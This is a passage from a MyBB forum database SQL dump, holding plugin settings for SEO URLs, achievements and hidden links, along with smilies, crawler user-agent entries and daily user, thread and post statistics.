Thread URL scheme. By default this is <i>Thread-{url}</i>. Please note that if you change this, you will also need to add a new rewrite rule in your .htaccess file. Leave empty to disable Google SEO URLs for Threads.', 'text', 'thread-{url}', '15', '50', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('402', 'google_seo_url_threadprefix', 'Thread Prefixes', 'Include thread prefixes in thread URLs?', 'text', '{prefix}{separator}{url}', '16', '50', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('403', 'google_seo_url_announcements', 'Announcement URL scheme', 'Enter the Announcement URL scheme. By default this is <i>Announcement-{url}</i>. Please note that if you change this, you will also need to add a new rewrite rule in your .htaccess file. Leave empty to disable Google SEO URLs for Announcements.', 'text', 'announcement-{url}', '17', '50', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('404', 'google_seo_url_users', 'User URL scheme', 'Enter the User URL scheme. By default this is <i>User-{url}</i>. Please note that if you change this, you will also need to add a new rewrite rule in your .htaccess file. Leave empty to disable Google SEO URLs for Users.', 'text', 'user-{url}', '18', '50', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('405', 'google_seo_url_calendars', 'Calendar URL scheme', 'Enter the Calendar URL scheme. By default this is <i>Calendar-{url}</i>. Please note that if you change this, you will also need to add a new rewrite rule in your .htaccess file. Leave empty to disable Google SEO URLs for Calendars.', 'text', 'calendar-{url}', '19', '50', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('406', 'google_seo_url_events', 'Event URL scheme', 'Enter the Event URL scheme. By default this is <i>Event-{url}</i>. Please note that if you change this, you will also need to add a new rewrite rule in your .htaccess file. Leave empty to disable Google SEO URLs for Events.', 'text', 'event-{url}', '20', '50', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('407', 'google_seo_url_parent_forum', 'Include parent forum in forum URLs?', 'Set the scheme that should be used to include the parent forum in the forum URL. {parent} is the Google SEO URL of the parent forum, {url} the URL of the forum itself. Enabling this option is not recommended and costs an extra query in the URL creation / verification step for forum URLs.', 'text', 'forumdisplay.php?{url}', '21', '50', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('408', 'google_seo_url_parent_thread', 'Include parent forum in thread URLs?', 'Set the scheme that should be used to include the parent forum in the thread URL. {parent} is the Google SEO URL of the parent forum, {url} the URL of the thread itself. Enabling this option is not recommended and costs an extra query in the URL creation / verification step for thread URLs.', 'text', 'showthread.php?{url}', '22', '50', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('409', 'google_seo_url_parent_announcement', 'Include parent forum in announcement URLs?', 'Set the scheme that should be used to include parent forum in the announcement URL. {parent} is the Google SEO URL of the parent forum, {url} the URL of the announcement itself. Enabling this option is not recommended and costs an extra query in the URL creation / verification step for announcement URLs.', 'text', 'announcements.php?{url}', '23', '50', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('410', 'google_seo_url_parent_event', 'Include parent calendar in event URLs?', 'Set the scheme that should be used to include parent calendar in the event URL. {parent} is the Google SEO URL of the parent calendar, {url} the URL of the event itself. Enabling this option is not recommended and costs an extra query in the URL creation / verification step for event URLs.', 'text', 'calendar.php?action=event&{url}', '24', '50', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('411', 'courtesyedittime', 'Courtesy Edit Time', 'Enter the number of seconds that the \'edited by\' message will not show for. As an example, if you put 60 in the box, users will be able to edit their posts for 60 seconds before the \'edited by\' message will be added.', 'text', '180', '1', '51', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('432', 'achivements_taskuseroffline', 'Give users offline achievements', 'Achievements also want to give users that have not been active before the last execution of the task?', 'yesno', '1', '10', '0', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('431', 'achivements_maxpostbit', 'Achievements maxima of postbit', 'Enter the maximium number of achievements that will be displayed in the user\'s postbit.', 'text', '13', '9', '0', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('430', 'achivements_rebuild', 'refresh achievements', 'refresh achievements', 'yesno', '0', '8', '0', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('429', 'achivements_usermp', 'User', 'Write the name of the user that sent the PM.', 'text', '61', '7', '0', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('428', 'achivements_bodymp', 'Message from PM', 'Enter your message private message. Write <ul> <li>{user} to show the user name</li> <li>{bbname} to show the forum name</li> <li>{bburl} to show the url of the forum</li> <li>{name} to display the name of the achievement</li> <li>{description} to display the description / reason for the achievement</li> <li>{image} to show the image of achievement</li> </ul>', 'textarea', 'Hi [b]{user}[/b] You have been granted an award on [url={bburl}][b]{bbname}[/b][/url] We thank you to not respond to this PM. ----------------------------- Name of award: {name} Description: {description} ----------------------------- The award you have been given in an automatic way to remove it or hide it from your postbit / profile go to control panel and edit them. ', '6', '0', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('426', 'achivements_sendmp', 'Send PM', '', 'textarea', 'a:3:{s:5:\"posts\";s:1:\"1\";s:7:\"threads\";s:1:\"1\";s:6:\"custom\";s:1:\"1\";}', '4', '0', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('427', 'achivements_subjectmp', 'Subject PM', 'Write the title of the private message.', 'textarea', 'You have been granted an award.', '5', '0', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('425', 'achivements_showachvpostbit', 'Achievements in Postbit', 'Show achievements in postbit for users?', 'yesno', '1', '3', '0', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('423', 'achivements_enable', 'Enable', 'Enable / disable the plugin. If disabled not lost user data (the gains are still displayed unless you disable these options).', 'yesno', '1', '1', '0', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('424', 'achivements_showachvprofile', 'Achievement Profile', 'Show achievements in the users profile?', 'yesno', '1', '2', '0', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('433', 'achivements_modcp', 'Give custom achievements from ModCP?', 'Want achievements that may occur from the ModCP custom? This will allow moderators and super moderators can provide custom achievements.', 'yesno', '1', '11', '0', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('434', 'hideUntilPost_link_enabled', 'Enable/Disable', 'Hide links until post has been made?', 'yesno', '0', '1', '52', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('435', 'hideUntilPost_lock_enabled', 'Enable/Disable', 'Enable lock bbcode? (Everything inside [lock]...[/lock] will be hiden until post is made)', 'yesno', '1', '2', '52', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('436', 'hideUntilPost_attach_enabled', 'Enable/Disable', 'Hide attachments until post has been made?', 'yesno', '0', '3', '52', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('437', 'hideUntilPost_gid_exclude', 'Exclude Groups', 'Enter the usergroups IDs separated by commas which this plugin should not apply. 0 = No usergroups excluded. (Still won\'t apply for mods and admins)', 'text', '0', '4', '52', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('438', 'hideUntilPost_fid_exclude', 'Exclude Forums', 'Enter the forum IDs separated by commas which this plugin should not apply. 0 = Applies for all forums.', 'text', '64', '5', '52', '0'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_smilies`; CREATE TABLE `mybb_smilies` ( `sid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(120) NOT NULL DEFAULT '', `find` varchar(120) NOT NULL DEFAULT '', `image` varchar(220) NOT NULL DEFAULT '', `disporder` smallint(5) unsigned NOT NULL DEFAULT '0', `showclickable` int(1) NOT NULL DEFAULT '0', PRIMARY KEY (`sid`) ) ENGINE=MyISAM AUTO_INCREMENT=57 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_smilies` WRITE; INSERT INTO `mybb_smilies` (`sid`, `name`, `find`, `image`, `disporder`, `showclickable`) VALUES ('39', 'ROFL', ':roflol:', 'images/smilies/Clean/24.gif', '1', '1'); INSERT INTO `mybb_smilies` (`sid`, `name`, `find`, `image`, `disporder`, `showclickable`) VALUES ('56', 'Devil', ':evil:', '/images/smilies/Clean/devil.png', '2', '1'); INSERT INTO `mybb_smilies` (`sid`, `name`, `find`, `image`, `disporder`, `showclickable`) VALUES ('41', 'Smile', ':)', '/images/smilies/Clean/smiling.png', '0', '1'); INSERT INTO `mybb_smilies` (`sid`, `name`, `find`, `image`, `disporder`, `showclickable`) VALUES ('42', 'Confused', ':?:', '/images/smilies/Clean/huh.png', '0', '1'); INSERT INTO `mybb_smilies` (`sid`, `name`, `find`, `image`, `disporder`, `showclickable`) VALUES ('43', 'Cool', ':cool:', '/images/smilies/Clean/cool.png', '0', '1'); INSERT INTO `mybb_smilies` (`sid`, `name`, `find`, `image`, `disporder`, `showclickable`) VALUES ('44', 'Surprised', ':O', '/images/smilies/Clean/surprised.png', '0', '1'); INSERT INTO `mybb_smilies` (`sid`, `name`, `find`, `image`, `disporder`, `showclickable`) VALUES ('45', 'Angel', ':angel:', '/images/smilies/Clean/angel.png', '0', '1'); INSERT INTO `mybb_smilies` (`sid`, `name`, `find`, `image`, `disporder`, `showclickable`) VALUES ('46', 'Embarrased', ':embarrased:', '/images/smilies/Clean/embarrased.png', '0', '1'); INSERT INTO `mybb_smilies` (`sid`, `name`, `find`, `image`, `disporder`, `showclickable`) VALUES ('47', 'Wink', ';)', '/images/smilies/Clean/wink.png', '0', '1'); INSERT INTO `mybb_smilies` (`sid`, `name`, `find`, `image`, `disporder`, `showclickable`) VALUES ('48', 'Tounge', ':P', '/images/smilies/Clean/tounge.png', '0', '1'); INSERT INTO `mybb_smilies` (`sid`, `name`, `find`, `image`, `disporder`, `showclickable`) VALUES ('49', 'Lub', '<3', '/images/smilies/Clean/lub.png', '0', '1'); INSERT INTO `mybb_smilies` (`sid`, `name`, `find`, `image`, `disporder`, `showclickable`) VALUES ('50', 'Grin', ':D', '/images/smilies/Clean/happy.png', '0', '1'); INSERT INTO `mybb_smilies` (`sid`, `name`, `find`, `image`, `disporder`, `showclickable`) VALUES ('51', 'Mad', ':angry:', '/images/smilies/Clean/mad.png', '0', '1'); INSERT INTO `mybb_smilies` (`sid`, `name`, `find`, `image`, `disporder`, `showclickable`) VALUES ('52', 'Sad', ':(', '/images/smilies/Clean/sad.png', '0', '1'); INSERT INTO `mybb_smilies` (`sid`, `name`, `find`, `image`, `disporder`, `showclickable`) VALUES ('53', 'Crying', ':\'(', '/images/smilies/Clean/crying.png', '0', '1'); INSERT INTO `mybb_smilies` (`sid`, `name`, `find`, `image`, `disporder`, `showclickable`) VALUES ('54', 'Hehe!', ':hehe!:', '/images/smilies/Clean/hehe!.png', '0', '1'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_spiders`; CREATE TABLE `mybb_spiders` ( `sid` int(10) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(100) NOT NULL DEFAULT '', `theme` int(10) unsigned NOT NULL DEFAULT '0', `language` varchar(20) NOT NULL DEFAULT '', `usergroup` int(10) unsigned NOT NULL DEFAULT '0', `useragent` varchar(200) NOT NULL DEFAULT '', `lastvisit` bigint(30) NOT NULL DEFAULT '0', PRIMARY KEY (`sid`) ) ENGINE=MyISAM AUTO_INCREMENT=97 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_spiders` WRITE; INSERT INTO `mybb_spiders` (`sid`, `name`, `theme`, `language`, `usergroup`, `useragent`, `lastvisit`) VALUES ('1', 'Google', '0', '', '8', 'Googlebot', '1352823252'); INSERT INTO `mybb_spiders` (`sid`, `name`, `theme`, `language`, `usergroup`, `useragent`, `lastvisit`) VALUES ('7', 'Bing', '0', '', '8', 'msnbot', '1351442860'); INSERT INTO `mybb_spiders` (`sid`, `name`, `theme`, `language`, `usergroup`, `useragent`, `lastvisit`) VALUES ('8', 'Yahoo!', '0', '', '8', 'Slurp', '1351027504'); INSERT INTO `mybb_spiders` (`sid`, `name`, `theme`, `language`, `usergroup`, `useragent`, `lastvisit`) VALUES ('9', 'Baidu', '0', '', '8', 'Baiduspider', '1349995130'); INSERT INTO `mybb_spiders` (`sid`, `name`, `theme`, `language`, `usergroup`, `useragent`, `lastvisit`) VALUES ('93', 'DuckDuckBot', '0', '', '8', 'DuckDuckBot', '0'); INSERT INTO `mybb_spiders` (`sid`, `name`, `theme`, `language`, `usergroup`, `useragent`, `lastvisit`) VALUES ('16', 'Google-Image', '0', '', '8', 'Googlebot-Image', '1352252605'); INSERT INTO `mybb_spiders` (`sid`, `name`, `theme`, `language`, `usergroup`, `useragent`, `lastvisit`) VALUES ('18', 'Alexa Internet', '0', '', '8', 'ia_archiver', '1352785253'); INSERT INTO `mybb_spiders` (`sid`, `name`, `theme`, `language`, `usergroup`, `useragent`, `lastvisit`) VALUES ('96', 'Web Archive ', '0', '', '8', 'archive.org_bot', '0'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_stats`; CREATE TABLE `mybb_stats` ( `dateline` bigint(30) NOT NULL DEFAULT '0', `numusers` int(10) unsigned NOT NULL DEFAULT '0', `numthreads` int(10) unsigned NOT NULL DEFAULT '0', `numposts` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`dateline`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; LOCK TABLES `mybb_stats` WRITE; INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1339704000', '1', '1', '1'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1339876800', '3', '2', '4'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1339963200', '4', '9', '17'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1340049600', '4', '16', '39'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1340136000', '4', '17', '42'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1340308800', '4', '17', '44'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1340481600', '5', '19', '50'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1340568000', '5', '22', '58'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1340654400', '5', '22', '59'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1340740800', '5', '23', '61'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1340827200', '5', '24', '70'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1341172800', '5', '26', '72'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1341432000', '6', '32', '83'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1341608400', '8', '32', '84'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1341694800', '9', '32', '84'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1341867600', '10', '32', '84'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1342040400', '12', '42', '97'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1342126800', '13', '44', '108'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1342213200', '16', '46', '115'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1342299600', '17', '48', '117'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1342386000', '19', '56', '133'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1343854800', '22', '56', '134'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1343941200', '29', '69', '162'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1344027600', '32', '69', '162'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1344114000', '34', '74', '175'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1344200400', '35', '75', '177'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1344286800', '34', '87', '204'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1344373200', '38', '92', '215'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1344459600', '38', '92', '217'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1344546000', '39', '95', '222'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1344718800', '40', '95', '222'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1344805200', '42', '95', '225'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1344891600', '50', '104', '250'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1344978000', '59', '116', '289'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1345064400', '65', '129', '327'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1345150800', '67', '142', '364'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1345237200', '71', '149', '392'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1345323600', '70', '150', '420'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1345410000', '74', '156', '450'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1345496400', '82', '168', '555'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1345582800', '90', '179', '612'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1345669200', '96', '188', '664'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1345755600', '106', '203', '778'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1345842000', '108', '204', '808'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1345780800', '110', '211', '855'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1345867200', '120', '232', '998'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1345953600', '124', '246', '1076'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1346040000', '129', '262', '1176'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1346126400', '133', '270', '1268'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1346212800', '139', '280', '1318'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1346299200', '150', '288', '1340'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1346385600', '154', '297', '1381'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1346472000', '157', '297', '1393'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1346558400', '157', '304', '1434'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1346644800', '159', '320', '1496'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1346731200', '165', '329', '1559'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1346817600', '169', '335', '1583'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1346904000', '171', '347', '1628'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1346990400', '171', '348', '1643'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1347076800', '173', '353', '1663'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1347163200', '174', '371', '1718'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1347249600', '174', '377', '1744'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1347336000', '175', '381', '1781'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1347422400', '175', '386', '1813'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1347508800', '175', '404', '1861'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1347595200', '180', '425', '1977'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1347681600', '183', '438', '2062'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1347768000', '183', '455', '2154'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1347854400', '185', '461', '2239'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1347940800', '185', '467', '2274'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1348027200', '186', '478', '2329'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1348113600', '187', '486', '2361'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1348200000', '187', '488', '2387'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1348286400', '187', '489', '2400'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1348372800', '187', '490', '2454'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1348459200', '190', '506', '2515'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1348545600', '190', '509', '2545'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1348632000', '191', '520', '2600'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1348718400', '192', '524', '2647'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1348804800', '195', '546', '2709'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1348891200', '199', '593', '2864'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1348977600', '203', '621', '3011'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1349064000', '205', '635', '3112'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1349150400', '206', '640', '3156'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1349236800', '206', '643', '3212'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1349308800', '209', '652', '3313'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1349395200', '215', '678', '3451'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1349481600', '217', '718', '3654'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1349568000', '198', '735', '3742'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1349582400', '196', '746', '3792'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1349654400', '203', '758', '3885'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1349668800', '201', '760', '3900'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1349740800', '204', '771', '3996'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1349755200', '202', '761', '3917'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1349827200', '204', '780', '4064'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1349913600', '206', '795', '4160'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1350000000', '208', '808', '4222'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1350086400', '212', '832', '4436'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1350172800', '216', '841', '4550'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1350259200', '216', '861', '4679'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1350345600', '220', '879', '4820'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1350432000', '224', '902', '5050'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1350518400', '229', '956', '5348'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1350446400', '224', '909', '5106'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1350604800', '233', '971', '5497'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1350691200', '233', '991', '5680'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1350705600', '232', '977', '5528'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1350777600', '233', '1017', '5873'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1350864000', '236', '1042', '6036'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1350878400', '233', '1024', '5915'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1350950400', '237', '1047', '6093'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1351036800', '240', '1057', '6156'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1351123200', '202', '1073', '6247'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1351051200', '202', '1062', '6182'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1351209600', '204', '1086', '6322'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1351296000', '209', '1094', '6368'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1351382400', '212', 